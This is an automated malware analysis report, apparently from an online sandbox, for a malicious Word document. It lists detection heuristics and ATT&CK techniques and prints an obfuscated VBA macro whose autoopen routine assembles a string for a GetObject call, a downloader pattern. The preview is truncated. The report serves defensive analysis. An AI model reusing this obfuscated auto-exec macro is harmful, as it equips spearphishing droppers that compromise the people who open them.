MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro, indicates malicious intent. The GetObject call within the VBA p-code suggests an attempt to execute code or load external resources. While the exact payload is not discernible from the provided script, the overall pattern points to a macro-based downloader, commonly used in spearphishing attachments.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6935378-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6935378-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7551 bytes |
SHA-256: db489b3b5b1c917ef99e6ff942b79b3eef0de6e7f51285ab16d10250fd97a33c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kkAAGQ1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "iA4AcA"
Attribute VB_Base = "0{7C8A4825-941C-4994-854C-6E605938A45B}{399398B3-E5B3-4499-9124-1038E7552D7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "D_1AQc"
Attribute VB_Base = "0{41BBE01B-01E3-47EC-9DA7-146B3FD22F79}{5FE824F5-A357-40A0-BAED-D2546415514F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "pUQAZA1G"
Function UBGB1UA()
If IxQ4DAA > IxABAAk Then
OCAkA1B_ _
= 846513391 - _
ZDAACD
If ZAGAB_A < _
TAQ_ZAA Then
Hour _
Rnd _
(uwAAAX)
End If
End If
Set EUUA1Q _
= i4AAGAD
If WcBUQBC > TQAAQXD Then
I4wABAA _
= 573283557 - _
HwAAw4
If icDDCDxU < _
V4DDAZZ Then
Hour _
Rnd _
(HXAwABx)
End If
End If
Set HQ1DXG _
= pAAAkB1
End Function
Sub autoopen()
WDBAAA
End Sub
Function iAcAUQXA()
If JAZAAQAx > BADQADA Then
WcAABX _
= 232589972 - _
PkZZxBQB
If D1AAQ1BA < _
QUAA_1cx Then
Hour _
Rnd _
(i1BUCoQA)
End If
End If
Set sAUUQGA4 _
= n4GG4AAx
If zXQU_AQA > iX_BwUA Then
QA4BcAA1 _
= 414145683 - _
DAZAAX
If Ik4ABDAA < _
zAAGAcAD Then
Hour _
Rnd _
(UokUUA)
End If
End If
Set QAAoAAQU _
= ZAA1__
If S1AAcwA > okUXkcXQ Then
jAcxXXA _
= 614833377 - _
vkBQUw
If UAGDAG < _
nwcAACoA Then
Hour _
Rnd _
(OBoQAQU)
End If
End If
Set OAAAAxA _
= R41QZAw4
End Function
Attribute VB_Name = "aCcUcACB"
Function TDA_CG()
If woAUBCUA > XZZwAAAA Then
jDcBDDC _
= 347098921 - _
EZA1DX
If RAXQGoDA < _
oAGGAUA Then
Hour _
Rnd _
(CXxDQAAC)
End If
End If
Set tAXckA _
= jDXXXU
If mBAAAU > uZBxAUDA Then
RCoBCAB _
= 627438000 - _
zAAGQAoA
If fUAXXAAD < _
UwxA_U Then
Hour _
Rnd _
(CDXQAC_Q)
End If
End If
Set RAAAQxA _
= UUU_A_ZQ
End Function
Function WDBAAA()
On Error Resume Next
If jBQCUDA > BQXC11 Then
iUCDxAAA _
= 677686738 - _
Z1B_Z4
If HZQAAoA < _
YD1AA_AG Then
Hour _
Rnd _
(zA4A_oD)
End If
End If
Set RUD_QQw _
= Qw1BAoA4
If YkBAUZ > PAAAUD Then
fAQADAQ _
= 802607471 - _
jwQQDDAB
If d1ADUAAA < _
KXAc4A Then
Hour _
Rnd _
(BAQAxBD1)
End If
End If
Set RXAZDo _
= JAAABAAZ
If uocBAGA > DUACw4AA Then
pkUXDCQ _
= 999246609 - _
UckBB_
If NZABDQ < _
JoAAokcU Then
Hour _
Rnd _
(jooDGA)
End If
End If
Set DB_UAAA _
= KwAXADQA
U_wXDA = D_1AQc.VBDAAQB + D_1AQc.qUxCAA + D_1AQc.VBDAAQB + D_1AQc.nxAAQwU + D_1AQc.VBDAAQB
If sAAAAAAx > fZ1CGBQ1 Then
rDxZAAAA _
= 403035629 - _
oBUUxDZD
If EXBAAD < _
YAxBAA_ Then
Hour _
Rnd _
(VXZ41cBA)
End If
End If
Set iQxXQG _
= JAADAw
If a1AD_44 > WBU_AxDD Then
jA1cAA _
= 236025334 - _
BGUwUA
If AZBDAXQ < _
LAcGQA Then
Hour _
Rnd _
(Aw1AAwX_)
End If
End If
Set l41AQA _
= iCAAQoA
If vUADCAD > jAAD4Bx Then
E_UA4k _
= 27812718 - _
zA_oQAc
If TBAZo1 < _
c_CA44G Then
Hour _
Rnd _
(rAQ4ACAA)
End If
End If
Set pADUAA _
= LB4ADkB
Set mQwAAAA = GetObject(D_1AQc.VBDAAQB + D_1AQc.qUxCAA + D_1AQc.VBDAAQB + D_1AQc.nxAAQwU + D_1AQc.VBDAAQB + D_1AQc.tDQX4wA1 + D_1AQc.VBDAAQB)
If sCDAQQ > JwcDkQUA Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.